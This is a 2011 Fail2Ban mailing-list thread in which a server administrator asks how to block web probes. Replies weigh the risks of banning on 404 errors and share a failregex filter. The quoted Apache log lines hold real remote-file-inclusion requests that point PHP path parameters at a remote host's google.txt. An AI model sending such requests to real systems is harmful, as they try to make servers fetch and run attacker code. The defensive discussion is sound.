From: Tim <ti...@ec...> - 2011-12-19 10:20:01
|
Hi People, Many thanks to those who spend their time on Fail2Ban, a fantastic tool. I have been using F2B for a couple of years with great results but I am now having trouble with attempts to find files with vulnerabilities, or at least, that is what I think it is. I am getting hundreds of log lines like the following everyday :- 62.225.155.90 - - [18/Dec/2011:20:40:56 +0000] "GET /administrator/images/publish_y.png?mosConfig_absolute_path=http://62.141.58.186/google.txt HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" 62.225.155.90 - - [18/Dec/2011:20:40:56 +0000] "GET /administrator/images/save.png?mosConfig_absolute_path=http://62.141.58.186/google.txt HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" 62.225.155.90 - - [18/Dec/2011:20:41:27 +0000] "GET /ajax/loadsplash.php?full_path=http://62.141.58.186/google.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" 62.225.155.90 - - [18/Dec/2011:20:41:45 +0000] "GET /apbn/templates/head.php?APB_SETTINGS[template_path]=http://62.141.58.186/google.txt HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" I want to get Fail2Ban to block these attempts but I can't find much info about doing so. On this page http://www.fail2ban.org/wiki/index.php/Apache it says "Under CentOS / RedHat Enterprise Linux, httpd (Apache) is not compiled with tcpwrappers support. As a result the example in jail.conf called "apache-tcpwrapper" does not work since /etc/hosts.deny does not affect apache." Can anyone please point me in the right direction to get this sorted. The version I am using (according to /usr/share/fail2ban/common) is "0.8.4" running on CentOS 5.7 Thanks for any help you can offer. PS. Please be gentle, I am something of a dimwit with Linux. |
From: Ben J. <be...@in...> - 2011-12-19 22:02:34
|
Tim, While it is possible to ban people (or bots) based on these types of events, doing so could have unintended and undesirable consequences. For example, this type of banning makes it possible for a malicious individual to deny access to legitimate users. Such a malicious individual could create specially-crafted links to your site that trigger 404 errors, intentionally, and encourage users to click on them. Those users would then be banned. Imagine if these links began appearing before yours in search engine results... You would need to be especially careful if you were to ban large IP blocks. Think about search engines, too. A few broken links on your site could cause a legitimate bot, like Google's, to be banned, which could hurt search engine rankings considerably for a public-facing site. Finally, a slight misconfiguration on your end, e.g., incorrect paths to images in CSS files, could cause all visitors to your site to be banned. As soon as the visitors hits the page, several 404s result, and the visitor's IP is banned. Are these risks that you're willing to take in order to stop the probing? Unless your server's resources are being consumed with these malicious 404s, I wouldn't worry about it. You should be far more concerned with the requests that DON'T generate 404s, as those files are actually present and, if vulnerable, should be the focus of your attention. Rather than ban these IPs, I would force Apache authentication over SSL on directories that should be reserved for administrative use (if practical), enable the "apache-auth" filter in fail2ban, and review the log entries for these directories regularly. Needless to say, you should also ensure that software is kept up-to-date on the server. Hope that helps, -Ben On 12/19/2011 4:45 AM, Tim wrote: > Hi People, > > Many thanks to those who spend their time on Fail2Ban, a fantastic tool. > > I have been using F2B for a couple of years with great results but I am now having trouble with attempts to find files with vulnerabilities, or at least, that is what I think it is. > > > I am getting hundreds of log lines like the following everyday :- > > 62.225.155.90 - - [18/Dec/2011:20:40:56 +0000] "GET /administrator/images/publish_y.png?mosConfig_absolute_path=http://62.141.58.186/google.txt HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" > > 62.225.155.90 - - [18/Dec/2011:20:40:56 +0000] "GET /administrator/images/save.png?mosConfig_absolute_path=http://62.141.58.186/google.txt HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" > > 62.225.155.90 - - [18/Dec/2011:20:41:27 +0000] "GET /ajax/loadsplash.php?full_path=http://62.141.58.186/google.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" > > 62.225.155.90 - - [18/Dec/2011:20:41:45 +0000] "GET /apbn/templates/head.php?APB_SETTINGS[template_path]=http://62.141.58.186/google.txt HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" > > > > > I want to get Fail2Ban to block these attempts but I can't find much info about doing so. > > On this page http://www.fail2ban.org/wiki/index.php/Apache it says "Under CentOS / RedHat Enterprise Linux, httpd (Apache) is not compiled with tcpwrappers support. As a result the example in jail.conf called "apache-tcpwrapper" does not work since /etc/hosts.deny does not affect apache." > > Can anyone please point me in the right direction to get this sorted. > > > The version I am using (according to /usr/share/fail2ban/common) is "0.8.4" running on CentOS 5.7 > > > Thanks for any help you can offer. > > > PS. Please be gentle, I am something of a dimwit with Linux. > > > > ------------------------------------------------------------------------------ > Learn Windows Azure Live! Tuesday, Dec 13, 2011 > Microsoft is holding a special Learn Windows Azure training event for > developers. It will provide a great way to learn Windows Azure and what it > provides. You can attend the event by watching it streamed LIVE online. > Learn more at http://p.sf.net/sfu/ms-windowsazure > _______________________________________________ > Fail2ban-users mailing list > Fai...@li... > https://lists.sourceforge.net/lists/listinfo/fail2ban-users > |
From: Brian K. <ch...@sm...> - 2011-12-20 00:19:37
|
On Dec 19, 2011, at 1:45 AM, Tim wrote: > > Hi People, > > Many thanks to those who spend their time on Fail2Ban, a fantastic tool. > > I have been using F2B for a couple of years with great results but I am now having trouble with attempts to find files with vulnerabilities, or at least, that is what I think it is. > > > I am getting hundreds of log lines like the following everyday :- > > 62.225.155.90 - - [18/Dec/2011:20:40:56 +0000] "GET /administrator/images/publish_y.png?mosConfig_absolute_path=http://62.141.58.186/google.txt HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" > > 62.225.155.90 - - [18/Dec/2011:20:40:56 +0000] "GET /administrator/images/save.png?mosConfig_absolute_path=http://62.141.58.186/google.txt HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" > > 62.225.155.90 - - [18/Dec/2011:20:41:27 +0000] "GET /ajax/loadsplash.php?full_path=http://62.141.58.186/google.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" > > 62.225.155.90 - - [18/Dec/2011:20:41:45 +0000] "GET /apbn/templates/head.php?APB_SETTINGS[template_path]=http://62.141.58.186/google.txt HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" > > > > > I want to get Fail2Ban to block these attempts but I can't find much info about doing so. I use this on OpenBSD: failregex = ^[[].*[]] [[]error[]] [[]client <HOST>[]] (File does not exist|script not found or unable to stat): .*(\.php|\.asp|\.exe|\.pl)$ ^[[].*[]] [[]error[]] [[]client <HOST>[]] File does not exist: .*(php|[Aa]dmin[Mm]y[Ss][Qq][Ll].*)$ and ban with a packet filter. You should be able to use the iptables jail (I use PF on OpenBSD). I haven't had any collateral damage, but then again I have very few dynamic components. Even though there's not much attack surface on my site, I'd rather ban reconnaissance attempts than give an attacker unlimited chances to get lucky. Before I implemented this filter I checked my logs carefully to see how many 404s there were and fixed all the broken links (search spiders have very long memories). -- chort |